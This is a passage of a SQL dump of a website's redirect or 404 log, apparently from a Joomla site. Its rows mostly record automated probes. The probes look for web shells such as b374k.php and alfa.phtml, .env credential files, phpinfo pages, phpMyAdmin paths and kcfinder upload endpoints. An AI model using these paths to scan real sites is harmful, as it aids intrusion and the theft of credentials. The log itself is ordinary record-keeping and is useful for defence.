00:00:00',301),(35794,'https://3s-technologies.com.tr/en/alfa-v4.php',NULL,'www.google.com','',9,0,'2024-07-22 20:43:12','0000-00-00 00:00:00',301),(35795,'http://3s-technologies.com.tr/en/profile.php',NULL,'www.google.com','',25,0,'2024-07-22 20:43:15','0000-00-00 00:00:00',301),(35796,'https://3s-technologies.com.tr/en/profile.php',NULL,'www.google.com','',8,0,'2024-07-22 20:43:18','0000-00-00 00:00:00',301),(35797,'http://3s-technologies.com.tr/tr/assets/ckeditor/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/assets/ckeditor/kcfinder/upload.php','',1,0,'2024-07-22 21:04:20','0000-00-00 00:00:00',301),(35798,'http://3s-technologies.com.tr/tr/asset/ckeditor/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/asset/ckeditor/kcfinder/upload.php','',1,0,'2024-07-22 21:04:20','0000-00-00 00:00:00',301),(35799,'http://3s-technologies.com.tr/tr/backend/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/backend/kcfinder/upload.php','',1,0,'2024-07-22 21:04:23','0000-00-00 00:00:00',301),(35800,'http://3s-technologies.com.tr/tr/assets/kcfinder-3.12/upload.php',NULL,'http://3s-technologies.com.tr/assets/kcfinder-3.12/upload.php','',1,0,'2024-07-22 21:04:25','0000-00-00 00:00:00',301),(35801,'http://3s-technologies.com.tr/tr/kcfinder-3.12/upload.php',NULL,'http://3s-technologies.com.tr/kcfinder-3.12/upload.php','',1,0,'2024-07-22 21:04:26','0000-00-00 00:00:00',301),(35802,'http://3s-technologies.com.tr/tr/editor/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/editor/kcfinder/upload.php','',1,0,'2024-07-22 21:04:27','0000-00-00 00:00:00',301),(35803,'http://3s-technologies.com.tr/tr/public/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/public/kcfinder/upload.php','',1,0,'2024-07-22 21:04:29','0000-00-00 00:00:00',301),(35804,'http://3s-technologies.com.tr/tr/js/ckeditor/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/js/ckeditor/kcfinder/upload.php','',1,0,'2024-07-22 21:04:30','0000-00-00 00:00:00',301),(35805,'http://3s-technologies.com.tr/tr/assets/plugin/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/assets/plugin/kcfinder/upload.php','',1,0,'2024-07-22 21:04:31','0000-00-00 00:00:00',301),(35806,'http://3s-technologies.com.tr/tr/assetslte/kcfinder/upload.php',NULL,'http://3s-technologies.com.tr/assetslte/kcfinder/upload.php','',1,0,'2024-07-22 21:04:32','0000-00-00 00:00:00',301),(35807,'http://www.3s-technologies.com.tr/en/vendor/laravel-filemanager/js/stand-alone-button.js',NULL,'','',1,0,'2024-07-23 08:56:40','0000-00-00 00:00:00',301),(35808,'https://www.3s-technologies.com.tr/en/vendor/laravel-filemanager/js/stand-alone-button.js',NULL,'','',1,0,'2024-07-23 08:56:44','0000-00-00 00:00:00',301),(35809,'http://3s-technologies.com.tr/tr/wp-admin/options.php',NULL,'http://3s-technologies.com.tr/wp-admin/options.php','',102,0,'2024-07-23 16:28:56','0000-00-00 00:00:00',301),(35810,'http://3s-technologies.com.tr/tr/jp.php',NULL,'http://3s-technologies.com.tr/jp.php','',193,0,'2024-07-23 16:28:57','0000-00-00 00:00:00',301),(35811,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/wp-login.php','',44,0,'2024-07-23 16:29:01','0000-00-00 00:00:00',301),(35812,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/themes/wp-login.php','',5,0,'2024-07-23 16:29:03','0000-00-00 00:00:00',301),(35813,'http://3s-technologies.com.tr/tr/wp-admin/js/about.php7',NULL,'http://3s-technologies.com.tr/wp-admin/js/about.php7','',13,0,'2024-07-23 16:29:03','0000-00-00 00:00:00',301),(35814,'http://3s-technologies.com.tr/tr/wp-includes/requests/network.php',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/network.php','',1,0,'2024-07-23 16:29:04','0000-00-00 00:00:00',301),(35815,'http://3s-technologies.com.tr/tr/wp-admin/user/network.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/network.php','',6,0,'2024-07-23 16:29:05','0000-00-00 00:00:00',301),(35816,'http://3s-technologies.com.tr/tr/.well-known/network.php',NULL,'http://3s-technologies.com.tr/.well-known/network.php','',1,0,'2024-07-23 16:29:05','0000-00-00 00:00:00',301),(35817,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-list?id=50&language=tr-tr',NULL,'','',1,0,'2024-08-01 08:02:33','0000-00-00 00:00:00',301),(35818,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-list?id=8&language=tr-tr',NULL,'','',1,0,'2024-08-01 08:03:12','0000-00-00 00:00:00',301),(35819,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-list?id=35&language=tr-tr',NULL,'','',1,0,'2024-08-01 08:04:00','0000-00-00 00:00:00',301),(35820,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-list?id=38&language=tr-tr',NULL,'','',2,0,'2024-08-01 08:04:17','0000-00-00 00:00:00',301),(35821,'https://3s-technologies.com.tr/tr/��r��nler/',NULL,'','',1,0,'2024-08-01 12:31:19','0000-00-00 00:00:00',301),(35822,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2024-08-02 17:31:53','0000-00-00 00:00:00',301),(35823,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-blog?id=18&language=tr-tr',NULL,'','',1,0,'2024-08-03 08:14:08','0000-00-00 00:00:00',301),(35824,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/components/content-component/article-category-blog?id=17&language=tr-tr',NULL,'','',1,0,'2024-08-03 08:14:13','0000-00-00 00:00:00',301),(35825,'https://3s-technologies.com.tr/en/wp-content',NULL,'www.google.com','',5,0,'2024-08-04 03:45:45','0000-00-00 00:00:00',301),(35826,'https://3s-technologies.com.tr/en/wp-includes',NULL,'www.google.com','',3,0,'2024-08-04 03:54:59','0000-00-00 00:00:00',301),(35827,'http://3s-technologies.com.tr/en/v1.php',NULL,'www.google.com','',4,0,'2024-08-04 05:34:25','0000-00-00 00:00:00',301),(35828,'https://3s-technologies.com.tr/en/v1.php',NULL,'www.google.com','',2,0,'2024-08-04 05:34:34','0000-00-00 00:00:00',301),(35829,'http://www.3s-technologies.com.tr/tr/.well-known/security.txt',NULL,'http://www.3s-technologies.com.tr/.well-known/security.txt','',1,0,'2024-08-07 14:25:45','0000-00-00 00:00:00',301),(35830,'http://www.3s-technologies.com.tr/tr/security.txt',NULL,'http://www.3s-technologies.com.tr/security.txt','',1,0,'2024-08-10 18:55:09','0000-00-00 00:00:00',301),(35831,'http://3s-technologies.com.tr/en/register',NULL,'','',3,0,'2024-08-12 18:01:03','0000-00-00 00:00:00',301),(35832,'http://3s-technologies.com.tr/en/vendor/laravel-filemanager/js/cropper.min.js',NULL,'','',1,0,'2024-08-12 18:01:05','0000-00-00 00:00:00',301),(35833,'http://3s-technologies.com.tr/en/packages/barryvdh/elfinder/js/elfinder.min.js',NULL,'','',1,0,'2024-08-12 18:01:06','0000-00-00 00:00:00',301),(35834,'http://3s-technologies.com.tr/en/elfinder',NULL,'','',1,0,'2024-08-12 18:01:07','0000-00-00 00:00:00',301),(35835,'https://3s-technologies.com.tr/tr/manifest.json',NULL,'https://3s-technologies.com.tr/manifest.json','',4,0,'2024-08-13 02:19:37','0000-00-00 00:00:00',301),(35836,'https://www.3s-technologies.com.tr/en/wp-content/plugins/wp-catcher/index.php',NULL,'www.google.com','',1,0,'2024-08-14 16:38:55','0000-00-00 00:00:00',301),(35837,'https://3s-technologies.com.tr/en/home-en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',4,0,'2024-08-15 00:25:50','0000-00-00 00:00:00',301),(35838,'http://3s-technologies.com.tr/tr/modules/simpleimportproduct/index.php',NULL,'','',1,0,'2024-08-15 23:06:27','0000-00-00 00:00:00',301),(35839,'http://3s-technologies.com.tr/en/libraries/joomla/session/session.php',NULL,'www.google.com','',1,0,'2024-08-16 05:21:52','0000-00-00 00:00:00',301),(35840,'https://3s-technologies.com.tr/en/libraries/joomla/session/session.php',NULL,'www.google.com','',1,0,'2024-08-16 05:21:52','0000-00-00 00:00:00',301),(35841,'https://www.3s-technologies.com.tr/en/public/.env',NULL,'','',2,0,'2024-08-16 21:27:29','0000-00-00 00:00:00',301),(35842,'https://www.3s-technologies.com.tr/en/laravel/.env',NULL,'','',2,0,'2024-08-16 21:27:30','0000-00-00 00:00:00',301),(35843,'https://www.3s-technologies.com.tr/en/infophp.php',NULL,'','',2,0,'2024-08-16 21:27:31','0000-00-00 00:00:00',301),(35844,'https://www.3s-technologies.com.tr/en/php_info.php',NULL,'','',2,0,'2024-08-16 21:27:32','0000-00-00 00:00:00',301),(35845,'https://www.3s-technologies.com.tr/en/test.php',NULL,'','',2,0,'2024-08-16 21:27:33','0000-00-00 00:00:00',301),(35846,'https://www.3s-technologies.com.tr/en/i.php',NULL,'','',2,0,'2024-08-16 21:27:34','0000-00-00 00:00:00',301),(35847,'https://www.3s-technologies.com.tr/en/asdf.php',NULL,'','',2,0,'2024-08-16 21:27:35','0000-00-00 00:00:00',301),(35848,'https://www.3s-technologies.com.tr/en/pinfo.php',NULL,'','',2,0,'2024-08-16 21:27:35','0000-00-00 00:00:00',301),(35849,'https://www.3s-technologies.com.tr/en/phpversion.php',NULL,'','',2,0,'2024-08-16 21:27:36','0000-00-00 00:00:00',301),(35850,'https://www.3s-technologies.com.tr/en/time.php',NULL,'','',2,0,'2024-08-16 21:27:37','0000-00-00 00:00:00',301),(35851,'https://www.3s-technologies.com.tr/en/temp.php',NULL,'','',2,0,'2024-08-16 21:27:38','0000-00-00 00:00:00',301),(35852,'https://www.3s-technologies.com.tr/en/old_phpinfo.php',NULL,'','',2,0,'2024-08-16 21:27:39','0000-00-00 00:00:00',301),(35853,'https://www.3s-technologies.com.tr/en/infos.php',NULL,'','',2,0,'2024-08-16 21:27:40','0000-00-00 00:00:00',301),(35854,'https://www.3s-technologies.com.tr/en/linusadmin-phpinfo.php',NULL,'','',2,0,'2024-08-16 21:27:41','0000-00-00 00:00:00',301),(35855,'https://www.3s-technologies.com.tr/en/php-info.php',NULL,'','',2,0,'2024-08-16 21:27:42','0000-00-00 00:00:00',301),(35856,'https://www.3s-technologies.com.tr/en/dashboard/phpinfo.php',NULL,'','',2,0,'2024-08-16 21:27:43','0000-00-00 00:00:00',301),(35857,'https://www.3s-technologies.com.tr/en/phpinfo.php3',NULL,'','',2,0,'2024-08-16 21:27:44','0000-00-00 00:00:00',301),(35858,'https://www.3s-technologies.com.tr/en/phpinfo.php4',NULL,'','',2,0,'2024-08-16 21:27:45','0000-00-00 00:00:00',301),(35859,'https://www.3s-technologies.com.tr/en/phpinfo.php5',NULL,'','',2,0,'2024-08-16 21:27:46','0000-00-00 00:00:00',301),(35860,'https://www.3s-technologies.com.tr/en/phpinfos.php',NULL,'','',2,0,'2024-08-16 21:27:47','0000-00-00 00:00:00',301),(35861,'https://www.3s-technologies.com.tr/en/_profiler/phpinfo.php',NULL,'','',1,0,'2024-08-16 21:27:48','0000-00-00 00:00:00',301),(35862,'https://www.3s-technologies.com.tr/en/laravel/core/.env',NULL,'','',2,0,'2024-08-16 21:27:49','0000-00-00 00:00:00',301),(35863,'https://www.3s-technologies.com.tr/en/beta/.env',NULL,'','',1,0,'2024-08-16 21:27:49','0000-00-00 00:00:00',301),(35864,'https://www.3s-technologies.com.tr/en/kyc/.env',NULL,'','',1,0,'2024-08-16 21:27:50','0000-00-00 00:00:00',301),(35865,'https://www.3s-technologies.com.tr/en/admin/.env',NULL,'','',2,0,'2024-08-16 21:27:51','0000-00-00 00:00:00',301),(35866,'https://www.3s-technologies.com.tr/en/prod/.env',NULL,'','',2,0,'2024-08-16 21:27:52','0000-00-00 00:00:00',301),(35867,'https://mail.3s-technologies.com.tr/tr/owa/auth/logon.aspx?replacecurrent=1&url=https://mail.3s-technologies.com.tr/owa',NULL,'','',2,0,'2024-08-17 00:54:26','0000-00-00 00:00:00',301),(35868,'http://mail.3s-technologies.com.tr/tr/wp-aa.php',NULL,'','',4,0,'2024-08-19 08:20:06','0000-00-00 00:00:00',301),(35869,'http://3s-technologies.com.tr/tr/wp-aa.php',NULL,'','',37,0,'2024-08-19 21:43:34','0000-00-00 00:00:00',301),(35870,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp-ver.php',NULL,'','',1,0,'2024-08-22 16:08:45','0000-00-00 00:00:00',301),(35871,'http://www.3s-technologies.com.tr/tr/wp-content/index.php',NULL,'','',15,0,'2024-08-22 16:09:01','0000-00-00 00:00:00',301),(35872,'http://www.3s-technologies.com.tr/tr/wp-ver.php',NULL,'','',1,0,'2024-08-22 16:09:16','0000-00-00 00:00:00',301),(35873,'https://3s-technologies.com.tr/en/contacts/en/',NULL,'https://3s-technologies.com.tr/en/','',2,0,'2024-08-23 08:10:24','0000-00-00 00:00:00',301),(35874,'http://3s-technologies.com.tr/en/wp-content/themes/bricks/style.css',NULL,'','',1,0,'2024-08-23 17:22:56','0000-00-00 00:00:00',301),(35875,'http://3s-technologies.com.tr/en/wp-includes/wp-includes/css/dashicons.min.css',NULL,'www.google.com','',1,0,'2024-08-27 02:12:32','0000-00-00 00:00:00',301),(35876,'https://www.3s-technologies.com.tr/en/administrator',NULL,'','',1,0,'2024-08-27 22:03:13','0000-00-00 00:00:00',301),(35877,'https://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=81&itemid=40&lang=tr',NULL,'','',4,0,'2024-08-28 02:05:28','0000-00-00 00:00:00',301),(35878,'https://3s-technologies.com.tr/en/mysqladmin',NULL,'','',5,0,'2024-08-29 17:09:49','0000-00-00 00:00:00',301),(35879,'https://3s-technologies.com.tr/en/p/m/a',NULL,'','',2,0,'2024-08-29 17:09:49','0000-00-00 00:00:00',301),(35880,'https://3s-technologies.com.tr/en/tools/phpmyadmin',NULL,'','',2,0,'2024-08-29 17:09:51','0000-00-00 00:00:00',301),(35881,'https://3s-technologies.com.tr/en/admin/phpmyadmin',NULL,'','',2,0,'2024-08-29 17:09:51','0000-00-00 00:00:00',301),(35882,'https://3s-technologies.com.tr/en/pma',NULL,'','',6,0,'2024-08-29 17:09:52','0000-00-00 00:00:00',301),(35883,'https://3s-technologies.com.tr/en/phpmyad',NULL,'','',2,0,'2024-08-29 17:09:53','0000-00-00 00:00:00',301),(35884,'https://3s-technologies.com.tr/en/phpmanager',NULL,'','',2,0,'2024-08-29 17:09:53','0000-00-00 00:00:00',301),(35885,'https://3s-technologies.com.tr/en/websql',NULL,'','',2,0,'2024-08-29 17:09:53','0000-00-00 00:00:00',301),(35886,'https://3s-technologies.com.tr/en/webdb',NULL,'','',2,0,'2024-08-29 17:09:53','0000-00-00 00:00:00',301),(35887,'https://3s-technologies.com.tr/en/web/phpmyadmin',NULL,'','',3,0,'2024-08-29 17:09:53','0000-00-00 00:00:00',301),(35888,'https://3s-technologies.com.tr/en/webadmin',NULL,'','',3,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35889,'https://3s-technologies.com.tr/en/admin',NULL,'','',27,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35890,'https://3s-technologies.com.tr/en/phpmyadmin',NULL,'','',4,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35891,'https://3s-technologies.com.tr/en/openserver/phpmyadmin',NULL,'','',2,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35892,'https://3s-technologies.com.tr/en/phpmy',NULL,'','',2,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35893,'https://3s-technologies.com.tr/en/phpmyadmin2',NULL,'','',4,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35894,'https://3s-technologies.com.tr/en/phpmyadmi',NULL,'','',2,0,'2024-08-29 17:09:54','0000-00-00 00:00:00',301),(35895,'https://3s-technologies.com.tr/en/phpmyad-sys',NULL,'','',1,0,'2024-08-29 17:09:55','0000-00-00 00:00:00',301),(35896,'https://3s-technologies.com.tr/en/phpmy-admin',NULL,'','',2,0,'2024-08-29 17:09:55','0000-00-00 00:00:00',301),(35897,'https://3s-technologies.com.tr/en/admin/mysql',NULL,'','',2,0,'2024-08-29 17:09:55','0000-00-00 00:00:00',301),(35898,'https://3s-technologies.com.tr/en/db',NULL,'','',2,0,'2024-08-29 17:09:55','0000-00-00 00:00:00',301),(35899,'https://3s-technologies.com.tr/en/sql',NULL,'','',1,0,'2024-08-29 17:09:55','0000-00-00 00:00:00',301),(35900,'https://3s-technologies.com.tr/en/phpmyadmin4',NULL,'','',2,0,'2024-08-29 17:09:56','0000-00-00 00:00:00',301),(35901,'https://3s-technologies.com.tr/en/php-my-admin',NULL,'','',2,0,'2024-08-29 17:09:56','0000-00-00 00:00:00',301),(35902,'https://3s-technologies.com.tr/en/dbadmin',NULL,'','',2,0,'2024-08-29 17:09:56','0000-00-00 00:00:00',301),(35903,'https://3s-technologies.com.tr/en/mysql-admin',NULL,'','',2,0,'2024-08-29 17:09:58','0000-00-00 00:00:00',301),(35904,'https://3s-technologies.com.tr/en/phpmyadmin3',NULL,'','',2,0,'2024-08-29 17:10:00','0000-00-00 00:00:00',301),(35905,'https://3s-technologies.com.tr/en/myadmin',NULL,'','',1,0,'2024-08-29 17:10:04','0000-00-00 00:00:00',301),(35906,'https://3s-technologies.com.tr/en/phpmya',NULL,'','',2,0,'2024-08-29 17:10:07','0000-00-00 00:00:00',301),(35907,'https://3s-technologies.com.tr/en/sqlmanager',NULL,'','',2,0,'2024-08-29 17:10:07','0000-00-00 00:00:00',301),(35908,'https://3s-technologies.com.tr/en/php-myadmin',NULL,'','',2,0,'2024-08-29 17:10:12','0000-00-00 00:00:00',301),(35909,'https://3s-technologies.com.tr/en/database',NULL,'','',1,0,'2024-08-29 17:24:21','0000-00-00 00:00:00',301),(35910,'https://3s-technologies.com.tr/en/phpmyadmin-2',NULL,'','',1,0,'2024-08-29 17:24:21','0000-00-00 00:00:00',301),(35911,'https://3s-technologies.com.tr/en/mysql',NULL,'','',1,0,'2024-08-29 17:24:21','0000-00-00 00:00:00',301),(35912,'https://3s-technologies.com.tr/en/phpmyads',NULL,'','',1,0,'2024-08-29 17:24:22','0000-00-00 00:00:00',301),(35913,'https://3s-technologies.com.tr/en/phpm',NULL,'','',1,0,'2024-08-29 17:24:23','0000-00-00 00:00:00',301),(35914,'https://3s-technologies.com.tr/en/mya',NULL,'','',1,0,'2024-08-29 17:24:24','0000-00-00 00:00:00',301),(35915,'https://3s-technologies.com.tr/en/mysqlmanager',NULL,'','',1,0,'2024-08-29 17:24:25','0000-00-00 00:00:00',301),(35916,'https://3s-technologies.com.tr/en/sqlweb',NULL,'','',1,0,'2024-08-29 17:24:28','0000-00-00 00:00:00',301),(35917,'http://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-blog?id=18&language=tr-tr',NULL,'','',1,0,'2024-09-01 03:48:47','0000-00-00 00:00:00',301),(35918,'http://www.3s-technologies.com.tr/tr/ww.php',NULL,'https://www.google.com','',6,0,'2024-09-04 06:20:40','0000-00-00 00:00:00',301),(35919,'http://www.3s-technologies.com.tr/tr/plug/vote/plug.xml',NULL,'http://www.3s-technologies.com.tr/plug/vote/plug.xml','',3,0,'2024-09-05 08:01:26','0000-00-00 00:00:00',301),(35920,'http://3s-technologies.com.tr/tr/assets/index-6baae3e6.js',NULL,'http://3s-technologies.com.tr/assets/index-6baae3e6.js','',1,0,'2024-09-05 16:31:57','0000-00-00 00:00:00',301),(35921,'http://3s-technologies.com.tr/en/dcs.php',NULL,'www.google.com','',2,0,'2024-09-08 04:46:38','0000-00-00 00:00:00',301),(35922,'https://3s-technologies.com.tr/en/dcs.php',NULL,'www.google.com','',2,0,'2024-09-08 04:46:42','0000-00-00 00:00:00',301),(35923,'http://3s-technologies.com.tr/en/b374k.php',NULL,'www.google.com','',7,0,'2024-09-08 04:46:54','0000-00-00 00:00:00',301),(35924,'https://3s-technologies.com.tr/en/b374k.php',NULL,'www.google.com','',4,0,'2024-09-08 04:46:58','0000-00-00 00:00:00',301),(35925,'https://3s-technologies.com.tr/en/shel.php',NULL,'www.google.com','',1,0,'2024-09-08 04:47:15','0000-00-00 00:00:00',301),(35926,'https://3s-technologies.com.tr/en/ganteng.php',NULL,'www.google.com','',1,0,'2024-09-08 04:47:30','0000-00-00 00:00:00',301),(35927,'http://3s-technologies.com.tr/en/marjan.php',NULL,'www.google.com','',1,0,'2024-09-08 04:48:16','0000-00-00 00:00:00',301),(35928,'https://3s-technologies.com.tr/en/marjan.php',NULL,'www.google.com','',1,0,'2024-09-08 04:48:20','0000-00-00 00:00:00',301),(35929,'http://3s-technologies.com.tr/en/webadmin.php',NULL,'www.google.com','',6,0,'2024-09-08 04:48:40','0000-00-00 00:00:00',301),(35930,'https://3s-technologies.com.tr/en/webadmin.php',NULL,'www.google.com','',3,0,'2024-09-08 04:48:45','0000-00-00 00:00:00',301),(35931,'https://3s-technologies.com.tr/en/up.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:02','0000-00-00 00:00:00',301),(35932,'http://3s-technologies.com.tr/en/alfa.phtml',NULL,'www.google.com','',2,0,'2024-09-08 04:49:06','0000-00-00 00:00:00',301),(35933,'https://3s-technologies.com.tr/en/alfa.phtml',NULL,'www.google.com','',2,0,'2024-09-08 04:49:11','0000-00-00 00:00:00',301),(35934,'https://3s-technologies.com.tr/en/shell.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:27','0000-00-00 00:00:00',301),(35935,'http://3s-technologies.com.tr/en/shel.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:32','0000-00-00 00:00:00',301),(35936,'https://3s-technologies.com.tr/en/shel.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:36','0000-00-00 00:00:00',301),(35937,'http://3s-technologies.com.tr/en/403.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:40','0000-00-00 00:00:00',301),(35938,'https://3s-technologies.com.tr/en/403.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:45','0000-00-00 00:00:00',301),(35939,'https://3s-technologies.com.tr/en/x.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:53','0000-00-00 00:00:00',301),(35940,'http://3s-technologies.com.tr/en/marijuana.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:49:57','0000-00-00 00:00:00',301),(35941,'https://3s-technologies.com.tr/en/marijuana.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:50:01','0000-00-00 00:00:00',301),(35942,'https://3s-technologies.com.tr/en/up.php5',NULL,'www.google.com','',1,0,'2024-09-08 04:50:10','0000-00-00 00:00:00',301),(35943,'https://3s-technologies.com.tr/en/up.php7',NULL,'www.google.com','',1,0,'2024-09-08 04:50:18','0000-00-00 00:00:00',301),(35944,'https://3s-technologies.com.tr/en/idx.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:50:34','0000-00-00 00:00:00',301),(35945,'http://3s-technologies.com.tr/en/bypass.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:50:38','0000-00-00 00:00:00',301),(35946,'https://3s-technologies.com.tr/en/bypass.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:50:42','0000-00-00 00:00:00',301),(35947,'http://3s-technologies.com.tr/en/bypass.php5',NULL,'www.google.com','',1,0,'2024-09-08 04:50:46','0000-00-00 00:00:00',301),(35948,'https://3s-technologies.com.tr/en/bypass.php5',NULL,'www.google.com','',1,0,'2024-09-08 04:50:50','0000-00-00 00:00:00',301),(35949,'http://3s-technologies.com.tr/en/bypass.php7',NULL,'www.google.com','',1,0,'2024-09-08 04:50:54','0000-00-00 00:00:00',301),(35950,'https://3s-technologies.com.tr/en/bypass.php7',NULL,'www.google.com','',1,0,'2024-09-08 04:50:58','0000-00-00 00:00:00',301),(35951,'http://3s-technologies.com.tr/en/ganteng.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:51:02','0000-00-00 00:00:00',301),(35952,'https://3s-technologies.com.tr/en/ganteng.phtml',NULL,'www.google.com','',1,0,'2024-09-08 04:51:07','0000-00-00 00:00:00',301),(35953,'http://3s-technologies.com.tr/en/ganteng.php5',NULL,'www.google.com','',1,0,'2024-09-08 04:51:11','0000-00-00 00:00:00',301),(35954,'https://3s-technologies.com.tr/en/ganteng.php5',NULL,'www.google.com','',1,0,'2024-09-08 04:51:15','0000-00-00 00:00:00',301),(35955,'http://3s-technologies.com.tr/en/v2.php',NULL,'www.google.com','',3,0,'2024-09-08 05:19:10','0000-00-00 00:00:00',301),(35956,'https://3s-technologies.com.tr/en/v2.php',NULL,'www.google.com','',1,0,'2024-09-08 05:19:14','0000-00-00 00:00:00',301),(35957,'https://3s-technologies.com.tr/en/fx.php',NULL,'www.google.com','',1,0,'2024-09-08 05:47:51','0000-00-00 00:00:00',301),(35958,'http://3s-technologies.com.tr/en/dr.php',NULL,'www.google.com','',3,0,'2024-09-08 05:48:43','0000-00-00 00:00:00',301),(35959,'https://3s-technologies.com.tr/en/dr.php',NULL,'www.google.com','',1,0,'2024-09-08 05:48:47','0000-00-00 00:00:00',301),(35960,'http://3s-technologies.com.tr/en/it.php',NULL,'www.google.com','',3,0,'2024-09-08 05:48:51','0000-00-00 00:00:00',301),(35961,'https://3s-technologies.com.tr/en/it.php',NULL,'www.google.com','',1,0,'2024-09-08 05:48:55','0000-00-00 00:00:00',301),(35962,'https://3s-technologies.com.tr/en/cp.php',NULL,'www.google.com','',1,0,'2024-09-08 05:49:48','0000-00-00 00:00:00',301),(35963,'https://3s-technologies.com.tr/en/bb.php',NULL,'www.google.com','',1,0,'2024-09-08 05:49:57','0000-00-00 00:00:00',301),(35964,'https://3s-technologies.com.tr/en/lf.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:07','0000-00-00 00:00:00',301),(35965,'http://3s-technologies.com.tr/en/xo.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:12','0000-00-00 00:00:00',301),(35966,'https://3s-technologies.com.tr/en/xo.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:16','0000-00-00 00:00:00',301),(35967,'http://3s-technologies.com.tr/en/fa.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:29','0000-00-00 00:00:00',301),(35968,'https://3s-technologies.com.tr/en/fa.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:33','0000-00-00 00:00:00',301),(35969,'http://3s-technologies.com.tr/en/kn.php',NULL,'www.google.com','',3,0,'2024-09-08 05:50:54','0000-00-00 00:00:00',301),(35970,'https://3s-technologies.com.tr/en/kn.php',NULL,'www.google.com','',1,0,'2024-09-08 05:50:58','0000-00-00 00:00:00',301),(35971,'http://3s-technologies.com.tr/en/v5.php',NULL,'www.google.com','',3,0,'2024-09-08 05:51:27','0000-00-00 00:00:00',301),(35972,'https://3s-technologies.com.tr/en/v5.php',NULL,'www.google.com','',1,0,'2024-09-08 05:51:32','0000-00-00 00:00:00',301),(35973,'http://3s-technologies.com.tr/en/am.php',NULL,'www.google.com','',3,0,'2024-09-08 05:51:36','0000-00-00 00:00:00',301),(35974,'https://3s-technologies.com.tr/en/am.php',NULL,'www.google.com','',1,0,'2024-09-08 05:51:40','0000-00-00 00:00:00',301),(35975,'http://3s-technologies.com.tr/en/ms.php',NULL,'www.google.com','',3,0,'2024-09-08 05:51:44','0000-00-00 00:00:00',301),(35976,'https://3s-technologies.com.tr/en/ms.php',NULL,'www.google.com','',1,0,'2024-09-08 05:51:49','0000-00-00 00:00:00',301),(35977,'http://3s-technologies.com.tr/en/xz.php',NULL,'www.google.com','',3,0,'2024-09-08 05:51:53','0000-00-00 00:00:00',301),(35978,'https://3s-technologies.com.tr/en/xz.php',NULL,'www.google.com','',1,0,'2024-09-08 05:51:57','0000-00-00 00:00:00',301),(35979,'http://3s-technologies.com.tr/en/ne.php',NULL,'www.google.com','',1,0,'2024-09-08 05:52:10','0000-00-00 00:00:00',301),(35980,'https://3s-technologies.com.tr/en/ne.php',NULL,'www.google.com','',1,0,'2024-09-08 05:52:14','0000-00-00 00:00:00',301),(35981,'https://3s-technologies.com.tr/en/wp2.php',NULL,'www.google.com','',1,0,'2024-09-08 05:53:49','0000-00-00 00:00:00',301),(35982,'https://3s-technologies.com.tr/en/owl.php',NULL,'www.google.com','',1,0,'2024-09-08 05:53:57','0000-00-00 00:00:00',301),(35983,'http://3s-technologies.com.tr/en/cms.php',NULL,'www.google.com','',3,0,'2024-09-08 05:54:18','0000-00-00 00:00:00',301),(35984,'https://3s-technologies.com.tr/en/cms.php',NULL,'www.google.com','',1,0,'2024-09-08 05:54:21','0000-00-00 00:00:00',301),(35985,'http://3s-technologies.com.tr/en/gel.php',NULL,'www.google.com','',3,0,'2024-09-08 05:54:25','0000-00-00 00:00:00',301),(35986,'https://3s-technologies.com.tr/en/gel.php',NULL,'www.google.com','',1,0,'2024-09-08 05:54:29','0000-00-00 00:00:00',301),(35987,'http://3s-technologies.com.tr/en/.fk.php',NULL,'www.google.com','',3,0,'2024-09-08 05:54:34','0000-00-00 00:00:00',301),(35988,'https://3s-technologies.com.tr/en/.fk.php',NULL,'www.google.com','',1,0,'2024-09-08 